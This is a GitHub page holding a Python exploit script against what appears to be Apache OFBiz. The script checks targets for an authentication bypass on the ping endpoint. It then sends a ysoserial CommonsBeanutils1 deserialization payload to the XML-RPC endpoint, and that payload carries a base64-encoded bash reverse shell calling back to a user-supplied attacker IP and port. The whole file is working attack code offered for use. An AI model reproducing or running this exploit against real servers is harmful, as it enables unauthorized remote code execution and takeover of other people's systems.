-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
124 lines (103 loc) · 4.94 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
import requests
import sys
import urllib3
import argparse
from urllib.parse import urlparse
import base64
import os
import subprocess
#Suppressing warnings related to insecure web requests in Python
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def ascii():
art = print(""" _ _ _ _ _ ___ _
| || |__ _ __| |__ | |_| |_ ___ | _ \ |__ _ _ _ ___| |_
| __ / _` / _| / / | _| ' \/ -_) | _/ / _` | ' \/ -_) _|
|_||_\__,_\__|_\_\ \__|_||_\___| |_| |_\__,_|_||_\___|\__|
""")
return art
def scan(clean_url):
try:
#Forming a request to ping and check if PONG is returned in the response
pingCheckUrl = f"{clean_url}/webtools/control/ping;/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
print("Scanning...")
response = requests.get(pingCheckUrl, verify=False)
if response.status_code == 200:
ping_response = requests.get(pingCheckUrl, timeout=7, verify=False)
if "PONG" in ping_response.text:
print("Target is vulnerable!!\n")
#Getting the user input to exploit or not
getUserChoice = input("Do you want to exploit this and pop a shell? (Y)es or (N)o \n")
if getUserChoice.lower() in ["y", "yes"]:
exploit(clean_url)
else:
sys.exit("Exiting..")
else:
print("Target is not vulnerable :(")
except Exception as e:
print(e)
def exploit(url):
try:
attackerIp = input("Enter your IP: ")
attackerPort = input("Enter the listening port: ")
#Base64 encoding the bash reverse shell payload
revShell = f"bash -i >& /dev/tcp/{attackerIp}/{attackerPort} 0>&1"
revShellBytes = revShell.encode('utf-8')
base64EncodedRevShellPayload = base64.b64encode(revShellBytes).decode()
#Checking if ysoserial-all.jar exists in the current directory before serialization
print("Checking if ysoserial-all.jar exists in the current directory....\n")
current_directory = os.getcwd()
YsoserialFileName = "ysoserial-all.jar"
YsoserialFile_path = os.path.join(current_directory, YsoserialFileName)
if os.path.exists(YsoserialFile_path) == False:
sys.exit("Please place the ysoserial-all.jar file in the current directory..")
else:
print("Serializing the payload\n")
#Serializing the payload with ysoserial-all.jar
commandToRun = f"""java -jar ysoserial-all.jar CommonsBeanutils1 'bash -c {{echo,{base64EncodedRevShellPayload}}}|{{base64,-d}}|{{bash,-i}}' """
result = subprocess.run(commandToRun, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=False)
#Base64 encoding the serialized payload and removing any new lines that would mess with the payload execution
FinalEncoded = base64.b64encode(result.stdout).decode().replace("\n","")
#Constructing the malicious request body
vulnURL = f"{url}/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y"
xmlPostBodyData = f"""<?xml version="1.0"?>
<methodCall>
<methodName>Methodname</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{FinalEncoded}</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>"""
#Sending the malicious request
sendPayload = requests.get(vulnURL, data=xmlPostBodyData, timeout=4, verify=False)
sys.exit("Exploit completed. Enjoy ^^ ")
except Exception as e:
print(e)
def main():
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <url>")
else:
ascii()
#Parsing the supplied url and removing trailing slashes ('/') from the end of the URL
parser = argparse.ArgumentParser(description="URL Parser")
parser.add_argument("url", help="The URL to parse")
args = parser.parse_args()
extractURL = args.url.rstrip('/')
#Parsing and checking if http or https scheme is used in the beginning when the user inputs the target url
parsedUrl = urlparse(extractURL)
#If the URL is found to be free of errors, passing it to the scan function
if parsedUrl.scheme in {"https", "http"}:
scan(extractURL)
else:
print("Use http or https in the beginning of the target URL...")
if __name__ == "__main__":
main()